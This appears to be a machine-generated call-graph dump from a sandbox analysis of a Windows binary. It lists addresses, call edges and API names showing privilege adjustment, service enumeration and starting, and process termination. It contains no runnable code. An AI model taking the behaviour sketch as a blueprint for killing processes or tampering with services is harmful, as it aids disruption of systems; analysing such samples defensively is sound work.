21980 443aad 21976->21980 21981 43b7d4 52 API calls 21977->21981 22945 43c9b4 77 API calls 21978->22945 21983 404cdc 14 API calls 21979->21983 21984 404cdc 14 API calls 21980->21984 21985 443f06 21981->21985 21987 44391e 21983->21987 21988 443ab2 21984->21988 21989 407450 15 API calls 21985->21989 21986 443d51 21990 407450 15 API calls 21986->21990 21991 4042f8 14 API calls 21987->21991 21992 4042f8 14 API calls 21988->21992 21993 443f12 21989->21993 21994 443d5d 21990->21994 21995 443923 21991->21995 21996 443ab7 21992->21996 21998 404cdc 14 API calls 21993->21998 21999 404cdc 14 API calls 21994->21999 22000 407450 15 API calls 21995->22000 21997 407450 15 API calls 21996->21997 22001 443ac3 21997->22001 22002 443f17 21998->22002 22003 443d62 21999->22003 22004 44392f 22000->22004 22005 404cdc 14 API calls 22001->22005 22006 4042f8 14 API calls 22002->22006 22007 4042f8 14 API calls 22003->22007 22008 404cdc 14 API calls 22004->22008 22010 443ac8 22005->22010 22011 443f1c 22006->22011 22012 443d67 22007->22012 22009 443934 22008->22009 22013 4042f8 14 API calls 22009->22013 22014 4042f8 14 API calls 22010->22014 22015 43bf00 23 API calls 22011->22015 22016 43bf00 23 API calls 22012->22016 22017 443939 22013->22017 22018 443acd 22014->22018 22019 443f26 22015->22019 22020 443d71 22016->22020 22021 407450 15 API calls 22017->22021 22022 407450 15 API calls 22018->22022 22023 43c1c8 21 API calls 22019->22023 22024 43c1c8 21 API calls 22020->22024 22026 443945 22021->22026 22027 443ad9 22022->22027 22028 443f30 Sleep 22023->22028 22025 443d7b Sleep 22024->22025 22029 407450 15 API calls 22025->22029 22030 404cdc 14 API calls 22026->22030 22031 404cdc 14 API calls 22027->22031 22051 443f44 22028->22051 22032 443d91 22029->22032 22033 44394a 22030->22033 22034 443ade 22031->22034 22036 404cdc 14 API calls 22032->22036 22037 4042f8 14 API calls 22033->22037 22038 4042f8 14 API calls 22034->22038 22035 443f6d Sleep 22041 43b58c 27 API calls 22035->22041 22039 443d96 22036->22039 22040 44394f 22037->22040 22042 443ae3 22038->22042 22043 4042f8 14 API calls 22039->22043 22044 407450 15 API calls 22040->22044 22045 443f81 22041->22045 22046 407450 15 API calls 22042->22046 22047 443d9b 22043->22047 22048 44395b 22044->22048 22049 407450 15 API calls 22045->22049 22050 443aef 22046->22050 22946 43d938 24 API calls 22047->22946 22053 404cdc 14 API calls 22048->22053 22054 443f8d 22049->22054 22055 404cdc 14 API calls 22050->22055 22051->22035 22056 43b58c 27 API calls 22051->22056 22057 443960 22053->22057 22058 404cdc 14 API calls 22054->22058 22059 443af4 22055->22059 22056->22051 22061 4042f8 14 API calls 22057->22061 22062 443f92 22058->22062 22060 4042f8 14 API calls 22059->22060 22064 443af9 22060->22064 22061->21849 22063 4042f8 14 API calls 22062->22063 22063->21849 22065 404564 17 API calls 22064->22065 22067 443b06 22065->22067 22066 443dd3 Sleep 22068 43b58c 27 API calls 22066->22068 22069 4072a4 15 API calls 22067->22069 22070 443de7 Sleep 22068->22070 22071 443b13 22069->22071 22072 404564 17 API calls 22070->22072 22074 443b15 22071->22074 22075 443b26 22071->22075 22076 443dfe 22072->22076 22073 443da0 22073->22066 22077 43b58c 27 API calls 22073->22077 22078 406bf0 15 API calls 22074->22078 22080 406bf0 15 API calls 22075->22080 22079 4072a4 15 API calls 22076->22079 22077->22073 22081 443b24 22078->22081 22082 443e0b 22079->22082 22080->22081 22084 443b43 22081->22084 22329 43a688 GetModuleHandleW 22081->22329 22083 443e47 22082->22083 22086 407450 15 API calls 22082->22086 22085 443e55 22083->22085 22947 43a724 18 API calls 22083->22947 22334 43de78 22084->22334 22092 407450 15 API calls 22085->22092 22091 443e19 22086->22091 22089 443b48 22433 43b7d4 22089->22433 22094 404cdc 14 API calls 22091->22094 22095 443e61 22092->22095 22097 443e1e 22094->22097 22098 404cdc 14 API calls 22095->22098 22101 4042f8 14 API calls 22097->22101 22099 443e66 22098->22099 22102 4042f8 14 API calls 22099->22102 22100 407450 15 API calls 22103 443b59 22100->22103 22104 443e23 22101->22104 22102->21887 22106 404cdc 14 API calls 22103->22106 22105 43e864 85 API calls 22104->22105 22107 443e2a 22105->22107 22108 443b5e 22106->22108 22109 407450 15 API calls 22107->22109 22110 4042f8 14 API calls 22108->22110 22111 443e36 22109->22111 22112 443b63 22110->22112 22113 404cdc 14 API calls 22111->22113 22114 404564 17 API calls 22112->22114 22115 443e3b 22113->22115 22116 443b70 22114->22116 22117 4042f8 14 API calls 22115->22117 22118 4072a4 15 API calls 22116->22118 22119 443e40 22117->22119 22120 443b7d 22118->22120 22121 43f310 21 API calls 22119->22121 22122 443b99 22120->22122 22123 404564 17 API calls 22120->22123 22121->22083 22502 43d0f8 22122->22502 22125 443b8c 22123->22125 22126 4072a4 15 API calls 22125->22126 22126->22122 22127 443bab 22128 407450 15 API calls 22127->22128 22129 443bb7 22128->22129 22130 404cdc 14 API calls 22129->22130 22131 443bbc 22130->22131 22132 4042f8 14 API calls 22131->22132 22133 443bc1 22132->22133 22652 43c598 22133->22652 22135 443bc6 22136 407450 15 API calls 22135->22136 22137 443bd2 22136->22137 22138 404cdc 14 API calls 22137->22138 22139 443bd7 22138->22139 22140 4042f8 14 API calls 22139->22140 22141 443bdc 22140->22141 22685 43e7dc 22141->22685 22144 407450 15 API calls 22145 443bed 22144->22145 22146 404cdc 14 API calls 22145->22146 22147 443bf2 22146->22147 22148 4042f8 14 API calls 22147->22148 22149 443bf7 22148->22149 22694 43bf00 22149->22694 22151 443c01 22731 43c1c8 OpenProcess 22151->22731 22153 443c0b Sleep 22158 443c1f 22153->22158 22154 443c48 Sleep 22758 43b58c 22154->22758 22156 443c5c Sleep 22157 407450 15 API calls 22156->22157 22159 443c72 22157->22159 22158->22154 22160 43b58c 27 API calls 22158->22160 22161 404cdc 14 API calls 22159->22161 22160->22158 22162 443c77 22161->22162 22163 4042f8 14 API calls 22162->22163 22164 443c7c 22163->22164 22786 43e864 22164->22786 22166 443c83 22167 407450 15 API calls 22166->22167 22168 443c8f 22167->22168 22169 404cdc 14 API calls 22168->22169 22170 443c94 22169->22170 22171 4042f8 14 API calls 22170->22171 22172 443c99 22171->22172 22931 43f310 22172->22931 22174 443ca0 22175 407450 15 API calls 22174->22175 22176 443cac 22175->22176 22177 404cdc 14 API calls 22176->22177 22178 443cb1 22177->22178 22179 4042f8 14 API calls 22178->22179 22180 443cb6 22179->22180 22180->21867 22181 443cbf 22180->22181 22943 43a724 18 API calls 22181->22943 22184 40a2eb 22183->22184 22950 405f98 22184->22950 22187 407450 22188 407473 22187->22188 22995 406824 22188->22995 22193 404cdc 22194 404d02 22193->22194 22195 404ce7 22193->22195 22197 404be8 14 API calls 22194->22197 22196 404be8 14 API calls 22195->22196 22198 404cfe 22196->22198 22197->22198 23038 404930 22198->23038 22201 4042f8 23048 40a264 14 API calls 22201->23048 22203 40430c 22203->21761 22204 4042a0 22204->22203 22205 4042c5 22204->22205 23046 40a264 14 API calls 22204->23046 23047 404294 10 API calls 22205->23047 22208 4042e6 22208->21761 23049 404448 22209->23049 22211 404448 15 API calls 22212 404528 22211->22212 22212->22211 22213 40453f 22212->22213 22213->21781 22215 406bf0 15 API calls 22214->22215 22216 40457a 22215->22216 22217 40459c GetCommandLineW 22216->22217 22218 40457e GetModuleFileNameW 22216->22218 22223 4045a3 22217->22223 23053 406d2c 22218->23053 22221 404448 15 API calls 22221->22223 22222 4045ba 22224 4072a4 22222->22224 22223->22221 22223->22222 22225 4072a8 22224->22225 22228 4072b8 22224->22228 22225->22228 23058 406d1c 15 API calls 22225->23058 22227 4072f2 22229 4072a4 15 API calls 22227->22229 22228->21790 22230 4072fb 22229->22230 23059 4041cc 14 API calls 22230->23059 22232 407306 22232->21790 22234 43a657 22233->22234 22234->21828 22234->21829 22236 43a7e1 22235->22236 22237 43a7f6 22235->22237 23121 4387ec 18 API calls 22236->23121 23122 4387a8 18 API calls 22237->23122 22240 43a7f2 23060 438890 22240->23060 22244 43a81c 22245 43a863 22244->22245 22248 43a827 GetLastError 22244->22248 23093 439408 22245->23093 22250 407450 15 API calls 22248->22250 22252 43a843 22250->22252 23123 407dec 22252->23123 22256 407450 15 API calls 22257 43a852 22256->22257 22260 404cdc 14 API calls 22257->22260 22258 43a906 22262 438b0c 20 API calls 22258->22262 22259 43a884 22259->22258 22263 40e50c 15 API calls 22259->22263 22261 43a857 22260->22261 22264 4042f8 14 API calls 22261->22264 22265 43a912 22262->22265 22270 43a8a0 22263->22270 22266 43a85c 22264->22266 22267 43a959 22265->22267 22272 43a91d GetLastError 22265->22272 23127 40632c 10 API calls 22266->23127 22269 439408 71 API calls 22267->22269 22271 43a968 22269->22271 22270->22258 22277 407450 15 API calls 22270->22277 22273 406bf0 15 API calls 22271->22273 22274 407450 15 API calls 22272->22274 22275 43a975 22273->22275 22276 43a939 22274->22276 22278 438860 17 API calls 22275->22278 22279 407dec 14 API calls 22276->22279 22280 43a8c7 22277->22280 22281 43a97c 22278->22281 22282 43a93e 22279->22282 22284 404cdc 14 API calls 22280->22284 22285 40e50c 15 API calls 22281->22285 22283 407450 15 API calls 22282->22283 22286 43a948 22283->22286 22287 43a8cc 22284->22287 22293 43a989 22285->22293 22288 404cdc 14 API calls 22286->22288 22289 4042f8 14 API calls 22287->22289 22290 43a94d 22288->22290 22291 43a8d1 22289->22291 22294 4042f8 14 API calls 22290->22294 22295 407450 15 API calls 22291->22295 22292 43aa10 22301 40e50c 15 API calls 22292->22301 22293->22292 22296 40e50c 15 API calls 22293->22296 22297 43a952 22294->22297 22298 43a8e0 22295->22298 22305 43a9a7 22296->22305 23129 40632c 10 API calls 22297->23129 22300 407450 15 API calls 22298->22300 22302 43a8e8 22300->22302 22307 43aa24 22301->22307 22303 407450 15 API calls 22302->22303 22304 43a8f2 22303->22304 22306 404cdc 14 API calls 22304->22306 22305->22292 22310 407450 15 API calls 22305->22310 22308 43a8f7 22306->22308 22307->21843 22309 4042f8 14 API calls 22308->22309 22311 43a8fc 22309->22311 22312 43a9ce 22310->22312 23128 40632c 10 API calls 22311->23128 22314 404cdc 14 API calls 22312->22314 22315 43a9d3 22314->22315 22316 4042f8 14 API calls 22315->22316 22317 43a9d8 22316->22317 22318 407450 15 API calls 22317->22318 22319 43a9e7 22318->22319 22320 407450 15 API calls 22319->22320 22321 43a9f2 22320->22321 22322 407450 15 API calls 22321->22322 22323 43a9fc 22322->22323 22324 404cdc 14 API calls 22323->22324 22325 43aa01 22324->22325 22326 4042f8 14 API calls 22325->22326 22327 43aa06 22326->22327 23130 40632c 10 API calls 22327->23130 22330 43a6bf 22329->22330 22331 43a69e 22329->22331 22330->22084 23172 40aa94 17 API calls 22331->23172 22333 43a6a9 22333->22330 23173 43c45c 22334->23173 22336 43deae 23183 43dc64 22336->23183 22341 407450 15 API calls 22342 43df08 22341->22342 22343 407450 15 API calls 22342->22343 22344 43df10 22343->22344 22345 404cdc 14 API calls 22344->22345 22346 43df15 22345->22346 22347 4042f8 14 API calls 22346->22347 22348 43df1a 22347->22348 22349 43dfaa 22348->22349 22350 43df2b 22348->22350 22351 43dfb7 22349->22351 22367 43e004 22349->22367 22353 43df7f 22350->22353 22355 407450 15 API calls 22350->22355 22354 43dfd9 22351->22354 22356 407450 15 API calls 22351->22356 22352 43e060 22357 43cea4 73 API calls 22352->22357 22359 407450 15 API calls 22353->22359 22365 43dfa5 22353->22365 22363 407450 15 API calls 22354->22363 22354->22365 22358 43df43 22355->22358 22360 43dfcf 22356->22360 22361 43e07c 22357->22361 22362 404cdc 14 API calls 22358->22362 22364 43df9b 22359->22364 22366 404cdc 14 API calls 22360->22366 23193 407184 15 API calls 22361->23193 22369 43df48 22362->22369 22370 43dff5 22363->22370 22371 404cdc 14 API calls 22364->22371 22365->22089 22372 43dfd4 22366->22372 22367->22352 22373 407450 15 API calls 22367->22373 22374 4042f8 14 API calls 22369->22374 22375 404cdc 14 API calls 22370->22375 22376 43dfa0 22371->22376 22377 4042f8 14 API calls 22372->22377 22378 43e03d 22373->22378 22379 43df4d 22374->22379 22380 43dffa 22375->22380 22381 4042f8 14 API calls 22376->22381 22377->22354 22382 404cdc 14 API calls 22378->22382 22383 407450 15 API calls 22379->22383 22384 4042f8 14 API calls 22380->22384 22381->22365 22385 43e042 22382->22385 22387 43df5c 22383->22387 22384->22365 22388 4042f8 14 API calls 22385->22388 22391 404cdc 14 API calls 22387->22391 22393 43e047 22388->22393 22396 43df61 22391->22396 22399 407450 15 API calls 22393->22399 22400 4042f8 14 API calls 22396->22400 22405 43e056 22399->22405 22401 43df66 22400->22401 22406 407450 15 API calls 22401->22406 22410 404cdc 14 API calls 22405->22410 22411 43df75 22406->22411 22415 43e05b 22410->22415 22416 404cdc 14 API calls 22411->22416 22420 4042f8 14 API calls 22415->22420 22421 43df7a 22416->22421 22420->22352 22425 4042f8 14 API calls 22421->22425 22425->22353 22438 43b7dc 22433->22438 22434 43b7f8 OpenSCManagerW 22435 43b80c GetLastError 22434->22435 22434->22438 22437 407450 15 API calls 22435->22437 22437->22438 22438->22434 22439 404cdc 14 API calls 22438->22439 22440 43b893 EnumServicesStatusExW 22438->22440 22442 43b99e CloseServiceHandle 22438->22442 22446 407dec 14 API calls 22438->22446 22447 43ba9f 22438->22447 22448 407450 15 API calls 22438->22448 22455 43b58c 27 API calls 22438->22455 22458 40e50c 15 API calls 22438->22458 22461 4042f8 14 API calls 22438->22461 22463 40632c 10 API calls 22438->22463 22465 4072a4 15 API calls 22438->22465 23217 408334 22438->23217 23220 43b1a8 22438->23220 22439->22438 22441 43b8af GetLastError 22440->22441 22440->22442 22443 43b8be CloseServiceHandle 22441->22443 22450 43b8fe 22441->22450 22442->22438 22445 407450 15 API calls 22443->22445 22444 408334 20 API calls 22444->22450 22445->22438 22446->22438 22449 407450 15 API calls 22447->22449 22448->22438 22452 43bab7 22449->22452 22450->22444 22454 43b944 EnumServicesStatusExW 22450->22454 22453 407dec 14 API calls 22452->22453 22456 43babc 22453->22456 22454->22442 22457 43b95c CloseServiceHandle GetLastError 22454->22457 22455->22438 22459 407450 15 API calls 22456->22459 22462 407450 15 API calls 22457->22462 22458->22438 22460 43bac6 22459->22460 22464 404cdc 14 API calls 22460->22464 22461->22438 22475 43b97e 22462->22475 22463->22438 22466 43bacb 22464->22466 22465->22438 22468 4042f8 14 API calls 22466->22468 22467 407dec 14 API calls 22467->22475 22469 43bad0 22468->22469 22471 408334 20 API calls 22469->22471 22470 407450 15 API calls 22470->22475 22496 43bae7 22471->22496 22472 404cdc 14 API calls 22472->22475 22473 4042f8 14 API calls 22473->22475 22474 43bb80 22476 406bf0 15 API calls 22474->22476 22475->22467 22475->22470 22475->22472 22475->22473 23274 40632c 10 API calls 22475->23274 22488 43bb8c 22476->22488 22478 43bbe4 22479 43bc13 22478->22479 22480 43bbed 22478->22480 22482 407450 15 API calls 22479->22482 22483 407450 15 API calls 22480->22483 22481 4072a4 15 API calls 22481->22496 22485 43bc22 22482->22485 22487 43bbfc 22483->22487 22484 406bf0 15 API calls 22484->22488 22489 404cdc 14 API calls 22485->22489 22490 407450 15 API calls 22487->22490 22488->22478 22488->22484 23275 407184 15 API calls 22488->23275 22491 43bc27 22489->22491 22492 43bc07 22490->22492 22494 4042f8 14 API calls 22491->22494 22495 404cdc 14 API calls 22492->22495 22493 408334 20 API calls 22493->22496 22499 43bc11 22494->22499 22497 43bc0c 22495->22497 22496->22474 22496->22481 22496->22493 22498 4042f8 14 API calls 22497->22498 22498->22499 23268 408340 22499->23268 22503 43d100 22502->22503 22503->22503 22504 43c45c 17 API calls 22503->22504 22505 43d124 22504->22505 23331 40f9d8 22505->23331 22510 43c45c 17 API calls 22514 43d14c 22510->22514 22511 43d2c1 22513 43d36a 22511->22513 22516 404564 17 API calls 22511->22516 22512 43d208 22515 407450 15 API calls 22512->22515 22518 406c44 14 API calls 22513->22518 22517 40f9d8 15 API calls 22514->22517 22519 43d217 22515->22519 22521 43d2d8 22516->22521 22522 43d157 22517->22522 22523 43d3af 22518->22523 22520 404cdc 14 API calls 22519->22520 22525 43d21c 22520->22525 22526 40f9d8 15 API calls 22521->22526 23340 40f7e8 22522->23340 22524 406c44 14 API calls 22523->22524 22528 43d3b9 22524->22528 22529 4042f8 14 API calls 22525->22529 22530 43d2e3 22526->22530 22532 43d3d1 22528->22532 22533 43d3c4 22528->22533 22534 43d221 22529->22534 23364 4070a0 22530->23364 22531 43d15f 22536 43d163 22531->22536 22537 43d1a0 22531->22537 22538 43c45c 17 API calls 22532->22538 22542 43c45c 17 API calls 22533->22542 22606 43d3cc 22533->22606 23414 43cf60 21 API calls 22534->23414 22541 43c45c 17 API calls 22536->22541 22539 407450 15 API calls 22537->22539 22543 43d3de 22538->22543 22544 43d1af 22539->22544 22540 43d2f3 23385 40f77c 22540->23385 22546 43d170 22541->22546 22549 43d465 22542->22549 22550 43cc44 81 API calls 22543->22550 22551 404cdc 14 API calls 22544->22551 22553 40f9d8 15 API calls 22546->22553 22547 43d50c 22554 43d543 22547->22554 22563 43c45c 17 API calls 22547->22563 22557 43cc44 81 API calls 22549->22557 22558 43d3eb 22550->22558 22559 43d1b4 22551->22559 22552 43d2fb 22560 43d373 22552->22560 22593 43d2ff 22552->22593 22561 43d17b 22553->22561 22554->22127 22555 43c45c 17 API calls 22565 43d4e8 22555->22565 22556 43d237 22566 43d23b 22556->22566 22567 43d29a 22556->22567 22568 43d472 22557->22568 22569 43d40c 22558->22569 22585 406c44 14 API calls 22558->22585 22570 4042f8 14 API calls 22559->22570 22564 43c45c 17 API calls 22560->22564 22562 407450 15 API calls 22561->22562 22571 43d18e 22562->22571 22572 43d51f 22563->22572 22573 43d380 22564->22573 22574 40f77c 4 API calls 22565->22574 22590 43c45c 17 API calls 22566->22590 22576 407450 15 API calls 22567->22576 22575 43d493 22568->22575 22591 406c44 14 API calls 22568->22591 22577 43d42d 22569->22577 22595 406c44 14 API calls 22569->22595 22578 43d1b9 22570->22578 22579 407450 15 API calls 22571->22579 22580 40f77c 4 API calls 22572->22580 22581 40f9d8 15 API calls 22573->22581 22584 43d4f0 22574->22584 22582 43d4b4 22575->22582 22600 406c44 14 API calls 22575->22600 22586 43d2a9 22576->22586 22596 406c44 14 API calls 22577->22596 22577->22606 22583 43c45c 17 API calls 22578->22583 22587 43d194 22579->22587 22588 43d527 22580->22588 22589 43d38b 22581->22589 22582->22606 22612 406c44 14 API calls 22582->22612 22592 43d1c6 22583->22592 22584->22547 22603 43c45c 17 API calls 22584->22603 22585->22569 22594 404cdc 14 API calls 22586->22594 22597 404cdc 14 API calls 22587->22597 22588->22554 22608 43c45c 17 API calls 22588->22608 22598 406fe0 15 API calls 22589->22598 22599 43d252 22590->22599 22591->22575 22601 40f9d8 15 API calls 22592->22601 22602 43c45c 17 API calls 22593->22602 22604 43d2ae 22594->22604 22595->22577 22596->22606 22607 43d199 22597->22607 22609 43d398 22598->22609 22610 40f9d8 15 API calls 22599->22610 22600->22582 22611 43d1d1 22601->22611 22613 43d324 22602->22613 22614 43d501 22603->22614 22605 4042f8 14 API calls 22604->22605 22615 43d298 22605->22615 22606->22547 22606->22555 22616 4042f8 14 API calls 22607->22616 22617 43d538 22608->22617 23395 43cc44 22609->23395 22619 43d25d 22610->22619 22620 407450 15 API calls 22611->22620 22612->22606 22621 40f9d8 15 API calls 22613->22621 22622 43cc44 81 API calls 22614->22622 22615->22511 22623 43d19e 22616->22623 22624 43cc44 81 API calls 22617->22624 22625 4070a0 15 API calls 22619->22625 22626 43d1e4 22620->22626 22627 43d32f 22621->22627 22622->22547 22623->22511 22623->22512 22624->22554 22628 43d26d 22625->22628 22629 407450 15 API calls 22626->22629 22630 4070a0 15 API calls 22627->22630 22634 407450 15 API calls 22628->22634 22631 43d1ea 22629->22631 22632 43d33f 22630->22632 22633 404cdc 14 API calls 22631->22633 22638 407450 15 API calls 22632->22638 22635 43d1ef 22633->22635 22636 43d286 22634->22636 22637 4042f8 14 API calls 22635->22637 22639 407450 15 API calls 22636->22639 22640 43d1f4 22637->22640 22641 43d358 22638->22641 22642 43d28e 22639->22642 23413 40632c 10 API calls 22640->23413 22644 407450 15 API calls 22641->22644 22645 404cdc 14 API calls 22642->22645 22646 43d360 22644->22646 22647 43d293 22645->22647 22648 404cdc 14 API calls 22646->22648 22650 4042f8 14 API calls 22647->22650 22649 43d365 22648->22649 22651 4042f8 14 API calls 22649->22651 22650->22615 22651->22513 22653 43c5d1 22652->22653 22654 43c5bb 22652->22654 23549 4387a8 18 API calls 22653->23549 23548 4387ec 18 API calls 22654->23548 22657 43c5cc 22658 438890 18 API calls 22657->22658 22659 43c5ed 22658->22659 23526 4389d8 22659->23526 22661 43c5fc 22662 43c600 GetLastError 22661->22662 22663 43c63c 22661->22663 22664 407450 15 API calls 22662->22664 23542 43937c 22663->23542 22666 43c61c 22664->22666 22667 407dec 14 API calls 22666->22667 22669 43c621 22667->22669 22668 43c6b4 22672 438860 17 API calls 22668->22672 22671 407450 15 API calls 22669->22671 22670 43c65d 22670->22668 22673 43c45c 17 API calls 22670->22673 22674 43c62b 22671->22674 22681 43c6f3 22672->22681 22675 43c68c 22673->22675 22676 404cdc 14 API calls 22674->22676 23551 407184 15 API calls 22675->23551 22678 43c630 22676->22678 22680 4042f8 14 API calls 22678->22680 22683 43c635 22680->22683 22681->22135 23550 40632c 10 API calls 22683->23550 23566 43ae28 22685->23566 22687 43e7e6 22688 43e7fa 22687->22688 22689 43b1a8 26 API calls 22687->22689 22690 43ae28 27 API calls 22688->22690 22689->22688 22691 43e804 22690->22691 22692 43e818 22691->22692 22693 43b1a8 26 API calls 22691->22693 22692->22144 22693->22692 22695 406bd8 22694->22695 22696 43bf27 GetCurrentProcess OpenProcessToken 22695->22696 22697 43bf97 22696->22697 22698 43bf4c GetLastError 22696->22698 22701 43bfa3 LookupPrivilegeValueW 22697->22701 23629 40f220 15 API calls 22698->23629 22700 43bf66 23630 407184 15 API calls 22700->23630 22703 43bffa AdjustTokenPrivileges 22701->22703 22704 43bfaf GetLastError 22701->22704 22707 43c031 GetLastError 22703->22707 22716 43bf92 22703->22716 23631 40f220 15 API calls 22704->23631 23633 40f220 15 API calls 22707->23633 22708 43bfc9 23632 407184 15 API calls 22708->23632 22713 43c04b 23634 407184 15 API calls 22713->23634 22716->22151 22732 43c216 TerminateProcess 22731->22732 22733 43c1da GetLastError 22731->22733 22734 43c222 CloseHandle GetLastError 22732->22734 22735 43c264 CloseHandle 22732->22735 22736 407450 15 API calls 22733->22736 22737 407450 15 API calls 22734->22737 22735->22153 22738 43c1f6 22736->22738 22739 43c244 22737->22739 22740 407dec 14 API calls 22738->22740 22741 407dec 14 API calls 22739->22741 22742 43c1fb 22740->22742 22744 43c249 22741->22744 22743 407450 15 API calls 22742->22743 22745 43c205 22743->22745 22746 407450 15 API calls 22744->22746 22747 404cdc 14 API calls 22745->22747 22748 43c253 22746->22748 22749 43c20a 22747->22749 22750 404cdc 14 API calls 22748->22750 22752 4042f8 14 API calls 22749->22752 22751 43c258 22750->22751 22753 4042f8 14 API calls 22751->22753 22754 43c20f 22752->22754 22755 43c25d 22753->22755 23635 40632c 10 API calls 22754->23635 23636 40632c 10 API calls 22755->23636 22759 43b59e 22758->22759 22760 407450 15 API calls 22759->22760 22761 43b5c5 22760->22761 22762 407450 15 API calls 22761->22762 22763 43b5cd 22762->22763 22764 407450 15 API calls 22763->22764 22765 43b5d7 22764->22765 22766 404cdc 14 API calls 22765->22766 22767 43b5dc 22766->22767 22768 4042f8 14 API calls 22767->22768 22769 43b5e1 OpenSCManagerW 22768->22769 22770 43b5f8 GetLastError 22769->22770 22772 43b610 22769->22772 23637 43b48c 17 API calls 22770->23637 22773 43b61a OpenServiceW 22772->22773 22774 43b642 StartServiceW 22773->22774 22775 43b62d GetLastError 22773->22775 22777 43b6a6 CloseServiceHandle CloseServiceHandle 22774->22777 22778 43b65a GetLastError 22774->22778 23638 43b48c 17 API calls 22775->23638 22779 43b60a 22777->22779 22781 43b696 22778->22781 22782 43b669 Sleep StartServiceW 22778->22782 22779->22156 22780 43b63f 22780->22779 23640 43b48c 17 API calls 22781->23640 22782->22777 22783 43b686 22782->22783 23639 43b48c 17 API calls 22783->23639 22787 43e879 22786->22787 22788 43e88f 22786->22788 23649 4387ec 18 API calls 22787->23649 23650 4387a8 18 API calls 22788->23650 22791 43e88a 22792 438890 18 API calls 22791->22792 22793 43e8ab 22792->22793 22794 4389d8 19 API calls 22793->22794 22795 43e8ba 22794->22795 22796 43e8fa 22795->22796 22797 43e8be GetLastError 22795->22797 23641 4396b8 22796->23641 22799 407450 15 API calls 22797->22799 22801 43e8da 22799->22801 22802 407dec 14 API calls 22801->22802 22804 43e8df 22802->22804 22803 438860 17 API calls 22805 43e95b 22803->22805 22806 407450 15 API calls 22804->22806 22808 43ed53 22805->22808 22809 4389d8 19 API calls 22805->22809 22807 43e8e9 22806->22807 22810 404cdc 14 API calls 22807->22810 22808->22166 22811 43e974 22809->22811 22812 43e8ee 22810->22812 22813 43e9b4 22811->22813 22814 43e978 GetLastError 22811->22814 22815 4042f8 14 API calls 22812->22815 22816 4396b8 70 API calls 22813->22816 22817 407450 15 API calls 22814->22817 22818 43e8f3 22815->22818 22819 43e9d1 22816->22819 22820 43e994 22817->22820 23651 40632c 10 API calls 22818->23651 22823 438860 17 API calls 22819->22823 22822 407dec 14 API calls 22820->22822 22824 43e999 22822->22824 22825 43ea10 22823->22825 22826 407450 15 API calls 22824->22826 22827 4389d8 19 API calls 22825->22827 22828 43e9a3 22826->22828 22830 43ea1f 22827->22830 22829 404cdc 14 API calls 22828->22829 22831 43e9a8 22829->22831 22832 43ea23 GetLastError 22830->22832 22833 43ea5f 22830->22833 22834 4042f8 14 API calls 22831->22834 22836 407450 15 API calls 22832->22836 22835 4396b8 70 API calls 22833->22835 22837 43e9ad 22834->22837 22838 43ea7c 22835->22838 22839 43ea3f 22836->22839 23652 40632c 10 API calls 22837->23652 22843 438860 17 API calls 22838->22843 22840 407dec 14 API calls 22839->22840 22842 43ea44 22840->22842 22844 407450 15 API calls 22842->22844 22845 43eabb 22843->22845 22846 43ea4e 22844->22846 23644 439d1c 22845->23644 22849 404cdc 14 API calls 22846->22849 22850 43ea53 22849->22850 22852 4042f8 14 API calls 22850->22852 22851 4389d8 19 API calls 22853 43eadf 22851->22853 22854 43ea58 22852->22854 22855 43eae3 GetLastError 22853->22855 22856 43eb1f 22853->22856 23653 40632c 10 API calls 22854->23653 22859 407450 15 API calls 22855->22859 22932 43f314 22931->22932 22933 43f31f 22931->22933 23673 43c31c 22932->23673 22935 43c31c 21 API calls 22933->22935 22937 43f329 22935->22937 22936 43f31e 22936->22174 22937->22174 22939 43cebb 22938->22939 22940 42f9fc 73 API calls 22939->22940 22941 43cee1 22940->22941 22941->21811 22942->21872 22943->21867 22944->21892 22945->21986 22946->22073 22947->22085 22948->21918 22949->21912 22951 405fd0 22950->22951 22954 405f2c 22951->22954 22955 405f74 22954->22955 22956 405f3c 22954->22956 22955->22187 22956->22955 22958 4430dc 22956->22958 22959 4430f6 22958->22959 22960 44314c 22958->22960 22974 406098 22959->22974 22960->22956 22962 443122 22980 409610 22962->22980 22963 443100 22963->22962 22964 406bf0 15 API calls 22963->22964 22964->22962 22968 443136 22985 415b40 GetModuleHandleW 22968->22985 22971 408f6c 37 API calls 22972 443147 22971->22972 22990 415198 82 API calls 22972->22990 22976 4060a4 22974->22976 22979 4060d5 22976->22979 22991 405fe0 69 API calls 22976->22991 22992 406034 69 API calls 22976->22992 22993 406084 69 API calls 22976->22993 22979->22963 22981 4041b0 14 API calls 22980->22981 22982 40961d 22981->22982 22983 414698 GetVersionExW 22982->22983 22984 4146af 22983->22984 22984->22968 22986 415b61 22985->22986 22987 415b51 22985->22987 22986->22971 22994 40aa94 17 API calls 22987->22994 22989 415b5c 22989->22986 22990->22960 22991->22976 22992->22976 22993->22976 22994->22989 22996 406847 22995->22996 23006 404c3c 22996->23006 22998 406852 23018 4067c8 22998->23018 23001 406344 14 API calls 23002 406884 23001->23002 23003 4068c4 23002->23003 23004 4068d8 23003->23004 23005 4068ca SysFreeString 23003->23005 23004->22193 23005->23004 23007 404c3e 23006->23007 23010 404be8 23007->23010 23014 404c69 23007->23014 23028 404be8 23007->23028 23035 40a264 14 API calls 23007->23035 23008 404cb4 23008->22998 23010->23008 23015 404bfc 23010->23015 23026 404ba4 14 API calls 23010->23026 23012 404c33 23012->22998 23014->22998 23015->23012 23027 404318 14 API calls 23015->23027 23017 404c2e 23017->22998 23019 4067d4 23018->23019 23020 404c3c 14 API calls 23019->23020 23021 4067df 23020->23021 23022 404be8 14 API calls 23021->23022 23023 406816 23022->23023 23024 406344 14 API calls 23023->23024 23025 40681f 23024->23025 23025->23001 23026->23015 23027->23017 23029 404bf4 23028->23029 23032 404bfc 23028->23032 23036 404ba4 14 API calls 23029->23036 23031 404c33 23031->23007 23032->23031 23037 404318 14 API calls 23032->23037 23034 404c2e 23034->23007 23035->23007 23036->23032 23037->23034 23041 4048dc 23038->23041 23042 4048e8 23041->23042 23043 40491d 23042->23043 23045 404318 14 API calls 23042->23045 23043->22201 23045->23043 23046->22205 23047->22208 23048->22204 23051 404450 23049->23051 23050 406f48 15 API calls 23052 4044b7 23050->23052 23051->23050 23052->22212 23054 407504 14 API calls 23053->23054 23055 406d3c 23054->23055 23056 406344 14 API calls 23055->23056 23057 40459a 23056->23057 23057->22222 23058->22227 23059->22232 23061 4388b7 23060->23061 23062 43889d 23060->23062 23066 438b0c 23061->23066 23063 4388a3 RegCloseKey 23062->23063 23064 4388ad 23062->23064 23063->23064 23065 438860 17 API calls 23064->23065 23065->23061 23067 438b36 